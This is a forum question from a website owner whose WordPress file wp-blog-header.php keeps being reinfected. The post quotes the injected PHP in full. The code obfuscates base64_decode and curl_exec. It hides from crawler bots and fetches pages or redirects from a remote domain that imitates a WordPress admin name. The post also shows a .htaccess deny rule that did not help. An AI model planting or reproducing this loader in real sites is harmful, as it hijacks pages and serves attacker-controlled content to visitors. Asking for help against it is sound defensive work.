Someone modifying daily our website file wp-blog-header.php
They are adding below code which generates unneceassy pages automatic in our website, Code is :
$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);
if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
(stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {
$at = "base64_" . "decode";
$ch = curl_init($at("aHR0cDovL3dwYWRtaW5hZG1pLmNvbS8/") . "7d09c3986906332c22b598b781b38d33" . $p);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
if (isset($_SERVER["HTTP_USER_AGENT"]))
if (isset($_SERVER["HTTP_REFERER"]))
$ci = "curl_ex" . "ec";
$data = $ci($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strlen($data) > 255 && $code == 200) {
echo $data; exit;
} else if ($data && ($code == 301 || $code == 302)) {
header("Location: " . trim($data), true, $code); exit;
How can we prevent it? I have removed yesterday above script and today it is in there again.
I have put following in .htaccess
, But it did not help :
<Files wp-blog-header.php>
deny from all